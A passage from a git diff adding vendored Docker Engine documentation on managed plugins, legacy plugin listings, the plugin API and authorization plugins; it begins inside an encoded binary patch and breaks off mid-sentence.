zVbJw~Gw-m+6(~Swz;mT$oVCOq4c4oT3oMm;C-7+gguhteACfG_j>Mz@+_G_Lq(vj8 zEvJAfR1pp!Nunjh9Perj_sc-PGv>hqqef>2#i3|wgf z*b)*XU95KC-3p~+;89oZbMh_lc*jfkglDJB`KlfFQIvK@ z%q+__?P5sCBq7J;=0d*!f;531Xl$vV;nh=XgYGry^6Nf-JS4sLtHNJ5BBUt|j5~s4 z$|U4xai5T~h|0FZ5~SGWgQ%{fmi5&cWejNNvAp`|rSba8wgvDLm03G=R+n*q1xN_| zi|GKz1bpTW(7dbq_fo+G2F*x`h}ul`(kv!`CZxXv<$pn5*gRJnzPBq#&r13YkZM>; zU)=cjNym$`EFY2|?QmwyuK-ueaeA`%IvoxAQ&Fp(qkjqu=_gPMUy=++dtUUg`u;I*$=w}!?d!YT5m+bu5?qx_K>ubudLPXe z=o5_$7Mh-^g7b9BMp^0YwJ=Uy{|NM&3Y@z;gXn^eb`}9GgFqj!+Y<=ruR8x85qb)` zPCjt=0WaA;A{-tVJdFbm$9K^&Ioo(EjZo=l3k8T-r-2`VOp>}vUbxc$sCfAZ&x!41 zLd3xG_gHP|6YVm4-~f#fw4E7`3`Lq!8_#@va6t2|HZ7wwoqnH%uv3=iQ)=I3o7vT= zRwEdfi!v_*;->AMhBF+k4`;f%pp&m&HN|}!tz*u|G`aVr4C=S82;%w2@`5v=9+SxW z(T`3nJ-B7>R0cWCTm zz@|tqjje&?>#al>>21Pco_UXGGYA-c+DUxgF4JR6{3Y->#bBuOf}IC3_ChqE8PSCh z6{!&vCwvOQ=KZg`yXynk$N}~rtf%|IG73v_h_)A{afE%tF!Q7k8tV;Rr9r5J& z+GW+~-mx{%KN$!L@`Pd=;9^WZW44Jqbgpm~+xy?k0nW2HM_?wB=P?KD%!7q=w-f~V z>%hr%JRDi9(<}uoZ`dCQf%}U`q1mjgURr6tO1Z~|mBWpAIC&fhn(@!LD=QxY+{jDs zez-%|@%Tcw_XCGNLhql^pDPRclp%d|QB~(3@;)KU-o<;|N;&&o#N-@`Y8whj_m;ty zYGgas2Uv(E2lJ~##J`@=^ZH&MKFWHXra+H&+mjl3^j!LuV3EHQ(Jq?sX4O2b{>$E7 zm^*_eReMx+50g*(XtHCdFW*Vl_7)ZAWm&C8!}@bEM_OH%mcc9a4xCmMW-L|HR7Q5F zrly3%{ zgkR!PJLS>`6*}vv*_(MFkHk{p>+OituLG^<>S3bvhP*t_5pE?uznem<;Qy}Df2*>7 zEqvheaF`d#a1ClCSRA~#ecwI4z6#eSau?pO?u*!UDNB<3@G;!21)llk*8KT7QiJzm zVSR$CkBlT*IS*bK3Ub`%T2_3e6tSb#-0eI*mv6l~(a1nFd>}<)ibd3oZv#>XTzwx~ zwi^n~52Ky>t_ui0}-pv>G!{?qOzlmV;%-cz6rV7hO3hZnQ z!xQsdy6QK`({ljQaLZLC*LCFh5O(}7hn(#CR`cql4$ZI`?=d81w2^$5e@1n&?52=g z=m2VrEVqM28oRhu2NbcbohcndJ8+nH>IvQvJJrjG{S*?onOvL&ED;|s<~czwBOQMu zsp)<5AJ2+i=wLo~txKU7beb@eze8BQKoGD79VP(-~6OPt;WJ zPr~?y%B-~$iy9`{m`$KQN;od(uxh&72XyX)*5wwRWWzWksU=Ex{LbEeLha(@U+wp4 zciVv=aX?pLw8%ufe@l1kk>J$4ND5{!qJGi_tGTLDbdV2u2=iyybgKW#K}xYyVf{_d z5oOt6;qERQ@Z4cPl4Y(0(#>6{Nio4VpN!d6+H$?}W{p4HY-+iCsg23-h z&@6uS`(La0KkVaH#NRUt%&xnvu{4RU2+z5`&{{obsF|bb= z3nc_bG&Rs~q$|8m~-etE+C*k176>Zd!=5li@NKu;qB$Yq<&QJgRTC!G9E$gtMU`~4t^|k47 zarNL5ephp;KV94x1q`G;cL!M+{ciCdQnek21{*l<{(Sldos*7f57_Pf5K(`0HjE^7 zwSzo$!yFu-h*IVr{1VTsY^I5~;>VPTfl|jC8Ug9~p7$g`7Y*&ihR6A$R{aO51fo5r zzMo_Bi0Ny^Q#Es8ZBGuNK8qjQ^psP_6H_H_58Z9pQz!z?*8%-r7w9@&$m7Ae75C(T zu;hq^W3N@dh;`Sr6$&6q6ho=80(vp*w{(C49s*2aQsS^n)wnj)DT5wFIB@g~GIT(W zCcBF05$vC6pSO+c{|(21qiaE~E50C_m3SR&p7)fH_U70Dkb!7n2us&g4vb3{Aq7hr z+PEQW&vxdh1gX&oi=C(wJQ~(3GceB&jRQ~3vh$qHC9l&>Fy!moxOn}u1xrvL`cHFC zGAg8vv+NzBQscM&wzLR7?AyB)107xCxVXMK;2GR9ZyUIrf*XM5v5$v@@JAj$K0(b^WDx*A6(#xvTZ!}PbI zsvzr@!Nb4-pAKb?&Z;19C-d5fB^wd@$LBAEd*X70W;3Ap(n({8<0wkxq{`6J70v!P z&5aT!#!zt7#imRLi{-?8OZlt*w}U(3fAx$04~|(l+CFKhNaOv;#QyHOY`yF6 zXiJjF@d7&ctP68U@Rt9Y@_{;eex^{1jD+PsDneOK5qu3~|Nngr&uIN23q>kpTm=}a z>Z-oPMJq@)YeAK~Nev>mJ%Iw_+Y%SWa^5NS(B1pk(}@@`{H*a{vyFxEP8E_@(nMLM z)A+GFDiW_<%>Pn6DF0|`KMUXx9hJ9261pWVa0!W4(z%K4Fst(ezxeXkH&C3BIX(4r zN#Pl=;Ud2g;3jSTiHXOkt_=T1T0+OE#vgUo4hrZiMgShdF8~nFcbJ9)_#JH$C%`ki zl_W7cJp@qzlAqdSg&Tg>M6(UM{s17n?fL`2 zQ`z?KuL+LZiESx_$iskC!!8WK7|qb(0NSp)7^PRth=7Z>isHy2!r7XCVJD{Ao zHA%3@c#VWD%Oo`U9Aj-qsU*p1IK{gx9p6P9h?rScNaDPFu+(3Stb?O0WX97 z0NXtQ(|aQf(vdIXokMeA@hgh@1I=C1$Kt8>Z3Z^UtMIm8(6O(LSpS~%%bvDi0Zr;w zbv54H68G*dg>JA%Ukf6}ARGV;U_#T;YO^jdrEamIp`mvab%4tr1kHO8$WmRny*glQ zuSHT^y727}=G+P&got|i;oe#$yr}^3Yah4fd&5AA7z&0U_gf3tOU!;uH2vbN9OBp9 zQfg9qPR?BN-maoG-{GAptf};2*jU{r5rH!oVlXDiPaTv1e*~AMj))pR!I=WlON}E> z)$#b_w_KSzfQR&9f$BpWeAPRI88LC+2T4X_FA(OyQUs)z8@^Hk9YIAJ$xvm!PZB7F z);klo-y`>ch*DS2kTUG)=_y7!*^gLdybKD1uvuilV=arQYwrPuxGIPmDe*&O-3oOWl!pL4ZQqngo|(9JU_>ruvq9PBv5}L2A8(1Y`oSQzeUmoK z3C_aAQ?Oi=3tN3CT9?ZN3JW2<4*_-5$j%~E%+bLeMyHiKG$cqsHqm(_pUykqfu$2n z^!4v#AbO@-`$*S2V!vns91Z-ZaOaIbrb%k^q8yCDcjKu#n!SkAf+lxxS`;B%jY%tZ z=$$n@4<&GfA09%kRf*F+3l) z*5)R(pK7!?9YMpH4j{Q92tt(GaNle?{Wi7JqOcdV!SVWCuZ3_Nd)Q~3jYaI;N3muR ze7Kj@nA<03d3rh{Bh(%lQ1V>M;}*v8$c7Q}Dg{0^#AIJst?&POG*MwYabr!KaV@Q| zVIhOH-}}?T#GaH(#)8Pyj|U}3M$K7@^K=Jk=t^pTvoJY(`*IIY&wmyc7A$;yGZpNi zWrLlP_%1Q+Ovm9NHYPT9Gxs=WChS{eW25AGmxm7@7GGUwlco+0Nlj%m7fvb47)@*_ zE-TBsYbU`}5RFps*{>d7>HO&&IyGe)laYa@ymE_p<;EoDF?$(~60NGMOB-~wZ@Ts< zFVnvN{d?^pR9?uAKgug5E{@}a)vK|o(NUF$&uDiZ_l?+$Gm{f7=_DNU81P*jn4T7B zF|Cxiaf8D+GAb(Qqg5`8hklt}sh>UH(9n>Don5%Y(*3)4v!)oAencj-k`60+W+o;U zJpVv7cKn3-sg&7{BO^UMn{-M_%7h69y)RCAK1k8WM`p-waR2dnZD3+TyS24t;q0u%#Kc6*G1)$|wG}t?MNCXgw>4_#)JTCV zJjSQar1T%lnSHi)?qQM7R(Yv3ipK$M1_2WsX;+v;r-JM1t~oh7D|lqfuH$viMrOop?yq{o*Jp5Kep4{aAv%Brru zx9=t6j6*&AzOcBcTvk~bUQlqw%}RDsQ}<6HWz@;+tcAZe-?f^~PKCp>PWWbGpPvlt z>+6>shKG|nucChaURi;CjfDL(E-H$2yNiUfkeOpr;&QfZMj!PB!bastQgKa9%}2}{ z%zR3Rjnn_?r|qwIiT8{b6H46q{d<;; ztu0$$FZnsH+i5;#W@ba?j%iqnJZ*=^W!GBWaI2NUj2h|5;qD*TJ9s1|Q>MyoOq?c5 zc0fm# zGZtGCpOC<_va*u*+(m(mj7+iUsfWj1Ch}lmQBlPee>uNRSJWpISBMwAGWQ#8h9yGD z;+&j-j3B0;o12@LHp#~150@4fv%L6~g-{|+Ed9!|$BNjL^mJWeVPTyc(VpE> z&CShA$8x?kN%8T~>1u5xK?+i2J<8T)jo$_bxh*X%OUUEz5e*pKuCbfum!4pcAs!`D zljrPAi?JqBA=#{VH^*^KQ@U;@DSqGM@QWZ%y+V5J-@#k&HFsUEr+1@=WH?xk>+9>o z-v4ATd?1_>a{1j468QZMLIQgHNLvi%J88@VEcV4USqa6*0U{zIB_!CUfu+^eNP}$D zmLC&d9q)}xHEX|rbL*8Ryph2~X{f7v+kX4nU+23(m(7a%Ha~CWY%D1$d0ttF4?fAo zM9$mJ#L3(|sev=DGg+qVnC)(ntHT>DDlJttG&0Jy7B-?UGr$o%->*6odqE~k&O%a& zBfWaQVu5ah32wSi{kCIsTiX>i|M1brdhNXgMzov0zwdOmH$*1Bj8l|jM^Wt)QMK>U z=EV-7fbai#n_)Jes=qyv$qFivHO`FbB)MrEGI@!-8@;UeK z-^Abla@yPbeBDE;bH$yD@5)%Hs$R)OGQ&hzP@H%qerHBX_QyUfE*32=FaI+-I=cNW z7>mVHV|IJB + +# Docker Engine managed plugin system + +* [Installing and using a plugin](index.md#installing-and-using-a-plugin) +* [Developing a plugin](index.md#developing-a-plugin) + +Docker Engine's plugins system allows you to install, start, stop, and remove +plugins using Docker Engine. This mechanism is currently only available for +volume drivers, but more plugin driver types will be available in future releases. + +For information about the legacy plugin system available in Docker Engine 1.12 +and earlier, see [Understand legacy Docker Engine plugins](legacy_plugins.md). + +> **Note**: Docker Engine managed plugins are currently not supported +on Windows daemons. + +## Installing and using a plugin + +Plugins are distributed as Docker images and can be hosted on Docker Hub or on +a private registry. + +To install a plugin, use the `docker plugin install` command, which pulls the +plugin from Docker hub or your private registry, prompts you to grant +permissions or capabilities if necessary, and enables the plugin. + +To check the status of installed plugins, use the `docker plugin ls` command. +Plugins that start successfully are listed as enabled in the output. + +After a plugin is installed, you can use it as an option for another Docker +operation, such as creating a volume. + +In the following example, you install the `sshfs` plugin, verify that it is +enabled, and use it to create a volume. + +1. Install the `sshfs` plugin. + + ```bash + $ docker plugin install vieux/sshfs + + Plugin "vieux/sshfs" is requesting the following privileges: + - network: [host] + - capabilities: [CAP_SYS_ADMIN] + Do you grant the above permissions? [y/N] y + + vieux/sshfs + ``` + + The plugin requests 2 privileges: + - It needs access to the `host` network. + - It needs the `CAP_SYS_ADMIN` capability, which allows the plugin to run + the `mount` command. + +2. Check that the plugin is enabled in the output of `docker plugin ls`. + + ```bash + $ docker plugin ls + + ID NAME TAG DESCRIPTION ENABLED + 69553ca1d789 vieux/sshfs latest the `sshfs` plugin true + ``` + +3. Create a volume using the plugin. + This example mounts the `/remote` directory on host `1.2.3.4` into a + volume named `sshvolume`. This volume can now be mounted into containers. + + ```bash + $ docker volume create \ + -d vieux/sshfs \ + --name sshvolume \ + -o sshcmd=user@1.2.3.4:/remote + + sshvolume + ``` +4. Verify that the volume was created successfully. + + ```bash + $ docker volume ls + + DRIVER NAME + vieux/sshfs sshvolume + ``` + +5. Start a container that uses the volume `sshvolume`. + + ```bash + $ docker run -v sshvolume:/data busybox ls /data + + + ``` + +To disable a plugin, use the `docker plugin disable` command. To completely +remove it, use the `docker plugin remove` command. For other available +commands and options, see the +[command line reference](../reference/commandline/index.md). + +## Service creation using plugins + +In swarm mode, it is possible to create a service that allows for attaching +to networks or mounting volumes. Swarm schedules services based on plugin availability +on a node. In this example, a volume plugin is installed on a swarm worker and a volume +is created using the plugin. In the manager, a service is created with the relevant +mount options. It can be observed that the service is scheduled to run on the worker +node with the said volume plugin and volume. + +In the following example, node1 is the manager and node2 is the worker. + +1. Prepare manager. In node 1: + + ```bash + $ docker swarm init + Swarm initialized: current node (dxn1zf6l61qsb1josjja83ngz) is now a manager. + ``` + +2. Join swarm, install plugin and create volume on worker. In node 2: + + ```bash + $ docker swarm join \ + --token SWMTKN-1-49nj1cmql0jkz5s954yi3oex3nedyz0fb0xx14ie39trti4wxv-8vxv8rssmk743ojnwacrr2e7c \ + 192.168.99.100:2377 + ``` + + ```bash + $ docker plugin install tiborvass/sample-volume-plugin + latest: Pulling from tiborvass/sample-volume-plugin + eb9c16fbdc53: Download complete + Digest: sha256:00b42de88f3a3e0342e7b35fa62394b0a9ceb54d37f4c50be5d3167899994639 + Status: Downloaded newer image for tiborvass/sample-volume-plugin:latest + Installed plugin tiborvass/sample-volume-plugin + ``` + + ```bash + $ docker volume create -d tiborvass/sample-volume-plugin --name pluginVol + ``` + +3. Create a service using the plugin and volume. In node1: + + ```bash + $ docker service create --name my-service --mount type=volume,volume-driver=tiborvass/sample-volume-plugin,source=pluginVol,destination=/tmp busybox top + + $ docker service ls + z1sj8bb8jnfn my-service replicated 1/1 busybox:latest + ``` + docker service ls shows service 1 instance of service running. + +4. Observe the task getting scheduled in node 2: + + ```bash + $ docker ps --format '{{.ID}}\t {{.Status}} {{.Names}} {{.Command}}' + 83fc1e842599 Up 2 days my-service.1.9jn59qzn7nbc3m0zt1hij12xs "top" + ``` + +## Developing a plugin + +#### The rootfs directory +The `rootfs` directory represents the root filesystem of the plugin. In this +example, it was created from a Dockerfile: + +>**Note:** The `/run/docker/plugins` directory is mandatory inside of the +plugin's filesystem for docker to communicate with the plugin. + +```bash +$ git clone https://github.com/vieux/docker-volume-sshfs +$ cd docker-volume-sshfs +$ docker build -t rootfsimage . +$ id=$(docker create rootfsimage true) # id was cd851ce43a403 when the image was created +$ sudo mkdir -p myplugin/rootfs +$ sudo docker export "$id" | sudo tar -x -C myplugin/rootfs +$ docker rm -vf "$id" +$ docker rmi rootfsimage +``` + +#### The config.json file + +The `config.json` file describes the plugin. See the [plugins config reference](config.md). + +Consider the following `config.json` file. + +```json +{ + "description": "sshFS plugin for Docker", + "documentation": "https://docs.docker.com/engine/extend/plugins/", + "entrypoint": ["/go/bin/docker-volume-sshfs"], + "network": { + "type": "host" + }, + "interface" : { + "types": ["docker.volumedriver/1.0"], + "socket": "sshfs.sock" + }, + "capabilities": ["CAP_SYS_ADMIN"] +} +``` + +This plugin is a volume driver. It requires a `host` network and the +`CAP_SYS_ADMIN` capability. It depends upon the `/go/bin/docker-volume-sshfs` +entrypoint and uses the `/run/docker/plugins/sshfs.sock` socket to communicate +with Docker Engine. This plugin has no runtime parameters. + +#### Creating the plugin + +A new plugin can be created by running +`docker plugin create ./path/to/plugin/data` where the plugin +data contains a plugin configuration file `config.json` and a root filesystem +in subdirectory `rootfs`. + +After that the plugin `` will show up in `docker plugin ls`. +Plugins can be pushed to remote registries with +`docker plugin push `. diff --git a/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md b/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md new file mode 100644 index 0000000000..6ac914e366 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md @@ -0,0 +1,98 @@ +--- +redirect_from: +- "/engine/extend/plugins/" +title: "Use Docker Engine plugins" +description: "How to add additional functionality to Docker with plugins extensions" +keywords: "Examples, Usage, plugins, docker, documentation, user guide" +--- + + + +# Use Docker Engine plugins + +This document describes the Docker Engine plugins generally available in Docker +Engine. To view information on plugins managed by Docker, +refer to [Docker Engine plugin system](index.md). + +You can extend the capabilities of the Docker Engine by loading third-party +plugins. This page explains the types of plugins and provides links to several +volume and network plugins for Docker. + +## Types of plugins + +Plugins extend Docker's functionality. They come in specific types. For +example, a [volume plugin](plugins_volume.md) might enable Docker +volumes to persist across multiple Docker hosts and a +[network plugin](plugins_network.md) might provide network plumbing. + +Currently Docker supports authorization, volume and network driver plugins. In the future it +will support additional plugin types. + +## Installing a plugin + +Follow the instructions in the plugin's documentation. + +## Finding a plugin + +The sections below provide an inexhaustive overview of available plugins. + + + +### Network plugins + +Plugin | Description +----------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +[Contiv Networking](https://github.com/contiv/netplugin) | An open source network plugin to provide infrastructure and security policies for a multi-tenant micro services deployment, while providing an integration to physical network for non-container workload. Contiv Networking implements the remote driver and IPAM APIs available in Docker 1.9 onwards. +[Kuryr Network Plugin](https://github.com/openstack/kuryr) | A network plugin is developed as part of the OpenStack Kuryr project and implements the Docker networking (libnetwork) remote driver API by utilizing Neutron, the OpenStack networking service. It includes an IPAM driver as well. +[Weave Network Plugin](https://www.weave.works/docs/net/latest/introducing-weave/) | A network plugin that creates a virtual network that connects your Docker containers - across multiple hosts or clouds and enables automatic discovery of applications. Weave networks are resilient, partition tolerant, secure and work in partially connected networks, and other adverse environments - all configured with delightful simplicity. + +### Volume plugins + +Plugin | Description +----------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +[Azure File Storage plugin](https://github.com/Azure/azurefile-dockervolumedriver) | Lets you mount Microsoft [Azure File Storage](https://azure.microsoft.com/blog/azure-file-storage-now-generally-available/) shares to Docker containers as volumes using the SMB 3.0 protocol. [Learn more](https://azure.microsoft.com/blog/persistent-docker-volumes-with-azure-file-storage/). +[Blockbridge plugin](https://github.com/blockbridge/blockbridge-docker-volume) | A volume plugin that provides access to an extensible set of container-based persistent storage options. It supports single and multi-host Docker environments with features that include tenant isolation, automated provisioning, encryption, secure deletion, snapshots and QoS. +[Contiv Volume Plugin](https://github.com/contiv/volplugin) | An open source volume plugin that provides multi-tenant, persistent, distributed storage with intent based consumption. It has support for Ceph and NFS. +[Convoy plugin](https://github.com/rancher/convoy) | A volume plugin for a variety of storage back-ends including device mapper and NFS. It's a simple standalone executable written in Go and provides the framework to support vendor-specific extensions such as snapshots, backups and restore. +[DRBD plugin](https://www.drbd.org/en/supported-projects/docker) | A volume plugin that provides highly available storage replicated by [DRBD](https://www.drbd.org). Data written to the docker volume is replicated in a cluster of DRBD nodes. +[Flocker plugin](https://clusterhq.com/docker-plugin/) | A volume plugin that provides multi-host portable volumes for Docker, enabling you to run databases and other stateful containers and move them around across a cluster of machines. +[gce-docker plugin](https://github.com/mcuadros/gce-docker) | A volume plugin able to attach, format and mount Google Compute [persistent-disks](https://cloud.google.com/compute/docs/disks/persistent-disks). +[GlusterFS plugin](https://github.com/calavera/docker-volume-glusterfs) | A volume plugin that provides multi-host volumes management for Docker using GlusterFS. +[Horcrux Volume Plugin](https://github.com/muthu-r/horcrux) | A volume plugin that allows on-demand, version controlled access to your data. Horcrux is an open-source plugin, written in Go, and supports SCP, [Minio](https://www.minio.io) and Amazon S3. +[HPE 3Par Volume Plugin](https://github.com/hpe-storage/python-hpedockerplugin/) | A volume plugin that supports HPE 3Par and StoreVirtual iSCSI storage arrays. +[IPFS Volume Plugin](http://github.com/vdemeester/docker-volume-ipfs) | An open source volume plugin that allows using an [ipfs](https://ipfs.io/) filesystem as a volume. +[Keywhiz plugin](https://github.com/calavera/docker-volume-keywhiz) | A plugin that provides credentials and secret management using Keywhiz as a central repository. +[Local Persist Plugin](https://github.com/CWSpear/local-persist) | A volume plugin that extends the default `local` driver's functionality by allowing you specify a mountpoint anywhere on the host, which enables the files to *always persist*, even if the volume is removed via `docker volume rm`. +[NetApp Plugin](https://github.com/NetApp/netappdvp) (nDVP) | A volume plugin that provides direct integration with the Docker ecosystem for the NetApp storage portfolio. The nDVP package supports the provisioning and management of storage resources from the storage platform to Docker hosts, with a robust framework for adding additional platforms in the future. +[Netshare plugin](https://github.com/ContainX/docker-volume-netshare) | A volume plugin that provides volume management for NFS 3/4, AWS EFS and CIFS file systems. +[OpenStorage Plugin](https://github.com/libopenstorage/openstorage) | A cluster-aware volume plugin that provides volume management for file and block storage solutions. It implements a vendor neutral specification for implementing extensions such as CoS, encryption, and snapshots. It has example drivers based on FUSE, NFS, NBD and EBS to name a few. +[Portworx Volume Plugin](https://github.com/portworx/px-dev) | A volume plugin that turns any server into a scale-out converged compute/storage node, providing container granular storage and highly available volumes across any node, using a shared-nothing storage backend that works with any docker scheduler. +[Quobyte Volume Plugin](https://github.com/quobyte/docker-volume) | A volume plugin that connects Docker to [Quobyte](http://www.quobyte.com/containers)'s data center file system, a general-purpose scalable and fault-tolerant storage platform. +[REX-Ray plugin](https://github.com/emccode/rexray) | A volume plugin which is written in Go and provides advanced storage functionality for many platforms including VirtualBox, EC2, Google Compute Engine, OpenStack, and EMC. +[Virtuozzo Storage and Ploop plugin](https://github.com/virtuozzo/docker-volume-ploop) | A volume plugin with support for Virtuozzo Storage distributed cloud file system as well as ploop devices. +[VMware vSphere Storage Plugin](https://github.com/vmware/docker-volume-vsphere) | Docker Volume Driver for vSphere enables customers to address persistent storage requirements for Docker containers in vSphere environments. + +### Authorization plugins + + Plugin | Description +------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ + [Twistlock AuthZ Broker](https://github.com/twistlock/authz) | A basic extendable authorization plugin that runs directly on the host or inside a container. This plugin allows you to define user policies that it evaluates during authorization. Basic authorization is provided if Docker daemon is started with the --tlsverify flag (username is extracted from the certificate common name). + +## Troubleshooting a plugin + +If you are having problems with Docker after loading a plugin, ask the authors +of the plugin for help. The Docker team may not be able to assist you. + +## Writing a plugin + +If you are interested in writing a plugin for Docker, or seeing how they work +under the hood, see the [docker plugins reference](plugin_api.md). diff --git a/vendor/github.com/docker/docker/docs/extend/plugin_api.md b/vendor/github.com/docker/docker/docs/extend/plugin_api.md new file mode 100644 index 0000000000..693b77a2f3 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/extend/plugin_api.md @@ -0,0 +1,196 @@ +--- +title: "Plugins API" +description: "How to write Docker plugins extensions " +keywords: "API, Usage, plugins, documentation, developer" +--- + + + +# Docker Plugin API + +Docker plugins are out-of-process extensions which add capabilities to the +Docker Engine. + +This document describes the Docker Engine plugin API. To view information on +plugins managed by Docker Engine, refer to [Docker Engine plugin system](index.md). + +This page is intended for people who want to develop their own Docker plugin. +If you just want to learn about or use Docker plugins, look +[here](legacy_plugins.md). + +## What plugins are + +A plugin is a process running on the same or a different host as the docker daemon, +which registers itself by placing a file on the same docker host in one of the plugin +directories described in [Plugin discovery](#plugin-discovery). + +Plugins have human-readable names, which are short, lowercase strings. For +example, `flocker` or `weave`. + +Plugins can run inside or outside containers. Currently running them outside +containers is recommended. + +## Plugin discovery + +Docker discovers plugins by looking for them in the plugin directory whenever a +user or container tries to use one by name. + +There are three types of files which can be put in the plugin directory. + +* `.sock` files are UNIX domain sockets. +* `.spec` files are text files containing a URL, such as `unix:///other.sock` or `tcp://localhost:8080`. +* `.json` files are text files containing a full json specification for the plugin. + +Plugins with UNIX domain socket files must run on the same docker host, whereas +plugins with spec or json files can run on a different host if a remote URL is specified. + +UNIX domain socket files must be located under `/run/docker/plugins`, whereas +spec files can be located either under `/etc/docker/plugins` or `/usr/lib/docker/plugins`. + +The name of the file (excluding the extension) determines the plugin name. + +For example, the `flocker` plugin might create a UNIX socket at +`/run/docker/plugins/flocker.sock`. + +You can define each plugin into a separated subdirectory if you want to isolate definitions from each other. +For example, you can create the `flocker` socket under `/run/docker/plugins/flocker/flocker.sock` and only +mount `/run/docker/plugins/flocker` inside the `flocker` container. + +Docker always searches for unix sockets in `/run/docker/plugins` first. It checks for spec or json files under +`/etc/docker/plugins` and `/usr/lib/docker/plugins` if the socket doesn't exist. The directory scan stops as +soon as it finds the first plugin definition with the given name. + +### JSON specification + +This is the JSON format for a plugin: + +```json +{ + "Name": "plugin-example", + "Addr": "https://example.com/docker/plugin", + "TLSConfig": { + "InsecureSkipVerify": false, + "CAFile": "/usr/shared/docker/certs/example-ca.pem", + "CertFile": "/usr/shared/docker/certs/example-cert.pem", + "KeyFile": "/usr/shared/docker/certs/example-key.pem" + } +} +``` + +The `TLSConfig` field is optional and TLS will only be verified if this configuration is present. + +## Plugin lifecycle + +Plugins should be started before Docker, and stopped after Docker. For +example, when packaging a plugin for a platform which supports `systemd`, you +might use [`systemd` dependencies]( +http://www.freedesktop.org/software/systemd/man/systemd.unit.html#Before=) to +manage startup and shutdown order. + +When upgrading a plugin, you should first stop the Docker daemon, upgrade the +plugin, then start Docker again. + +## Plugin activation + +When a plugin is first referred to -- either by a user referring to it by name +(e.g. `docker run --volume-driver=foo`) or a container already configured to +use a plugin being started -- Docker looks for the named plugin in the plugin +directory and activates it with a handshake. See Handshake API below. + +Plugins are *not* activated automatically at Docker daemon startup. Rather, +they are activated only lazily, or on-demand, when they are needed. + +## Systemd socket activation + +Plugins may also be socket activated by `systemd`. The official [Plugins helpers](https://github.com/docker/go-plugins-helpers) +natively supports socket activation. In order for a plugin to be socket activated it needs +a `service` file and a `socket` file. + +The `service` file (for example `/lib/systemd/system/your-plugin.service`): + +``` +[Unit] +Description=Your plugin +Before=docker.service +After=network.target your-plugin.socket +Requires=your-plugin.socket docker.service + +[Service] +ExecStart=/usr/lib/docker/your-plugin + +[Install] +WantedBy=multi-user.target +``` +The `socket` file (for example `/lib/systemd/system/your-plugin.socket`): + +``` +[Unit] +Description=Your plugin + +[Socket] +ListenStream=/run/docker/plugins/your-plugin.sock + +[Install] +WantedBy=sockets.target +``` + +This will allow plugins to be actually started when the Docker daemon connects to +the sockets they're listening on (for instance the first time the daemon uses them +or if one of the plugin goes down accidentally). + +## API design + +The Plugin API is RPC-style JSON over HTTP, much like webhooks. + +Requests flow *from* the Docker daemon *to* the plugin. So the plugin needs to +implement an HTTP server and bind this to the UNIX socket mentioned in the +"plugin discovery" section. + +All requests are HTTP `POST` requests. + +The API is versioned via an Accept header, which currently is always set to +`application/vnd.docker.plugins.v1+json`. + +## Handshake API + +Plugins are activated via the following "handshake" API call. + +### /Plugin.Activate + +**Request:** empty body + +**Response:** +``` +{ + "Implements": ["VolumeDriver"] +} +``` + +Responds with a list of Docker subsystems which this plugin implements. +After activation, the plugin will then be sent events from this subsystem. + +Possible values are: + +* [`authz`](plugins_authorization.md) +* [`NetworkDriver`](plugins_network.md) +* [`VolumeDriver`](plugins_volume.md) + + +## Plugin retries + +Attempts to call a method on a plugin are retried with an exponential backoff +for up to 30 seconds. This may help when packaging plugins as containers, since +it gives plugin containers a chance to start up before failing any user +containers which depend on them. + +## Plugins helpers + +To ease plugins development, we're providing an `sdk` for each kind of plugins +currently supported by Docker at [docker/go-plugins-helpers](https://github.com/docker/go-plugins-helpers). diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md b/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md new file mode 100644 index 0000000000..ac1837f754 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md @@ -0,0 +1,260 @@ +--- +title: "Access authorization plugin" +description: "How to create authorization plugins to manage access control to your Docker daemon." +keywords: "security, authorization, authentication, docker, documentation, plugin, extend" +redirect_from: +- "/engine/extend/authorization/" +--- + + + +# Create an authorization plugin + +This document describes the Docker Engine plugins generally available in Docker +Engine. To view information on plugins managed by Docker Engine, +refer to [Docker Engine plugin system](index.md). + +Docker's out-of-the-box authorization model is all or nothing. Any user with +permission to access the Docker daemon can run any Docker client command. The +same is true for callers using Docker's Engine API to contact the daemon. If you +require greater access control, you can create authorization plugins and add +them to your Docker daemon configuration. Using an authorization plugin, a +Docker administrator can configure granular access policies for managing access +to Docker daemon. + +Anyone with the appropriate skills can develop an authorization plugin. These +skills, at their most basic, are knowledge of Docker, understanding of REST, and +sound programming knowledge. This document describes the architecture, state, +and methods information available to an authorization plugin developer. + +## Basic principles + +Docker's [plugin infrastructure](plugin_api.md) enables +extending Docker by loading, removing and communicating with +third-party components using a generic API. The access authorization subsystem +was built using this mechanism. + +Using this subsystem, you don't need to rebuild the Docker daemon to add an +authorization plugin. You can add a plugin to an installed Docker daemon. You do +need to restart the Docker daemon to add a new plugin. + +An authorization plugin approves or denies requests to the Docker daemon based +on both the current authentication context and the command context. The +authentication context contains all user details and the authentication method. +The command context contains all the relevant request data. + +Authorization plugins must follow the rules described in [Docker Plugin API](plugin_api.md). +Each plugin must reside within directories described under the +[Plugin discovery](plugin_api.md#plugin-discovery) section. + +**Note**: the abbreviations `AuthZ` and `AuthN` mean authorization and authentication +respectively. + +## Default user authorization mechanism + +If TLS is enabled in the [Docker daemon](https://docs.docker.com/engine/security/https/), the default user authorization flow extracts the user details from the certificate subject name. +That is, the `User` field is set to the client certificate subject common name, and the `AuthenticationMethod` field is set to `TLS`. + +## Basic architecture + +You are responsible for registering your plugin as part of the Docker daemon +startup. You can install multiple plugins and chain them together. This chain +can be ordered. Each request to the daemon passes in order through the chain. +Only when all the plugins grant access to the resource, is the access granted. + +When an HTTP request is made to the Docker daemon through the CLI or via the +Engine API, the authentication subsystem passes the request to the installed +authentication plugin(s). The request contains the user (caller) and command +context. The plugin is responsible for deciding whether to allow or deny the +request. + +The sequence diagrams below depict an allow and deny authorization flow: + +![Authorization Allow flow](images/authz_allow.png) + +![Authorization Deny 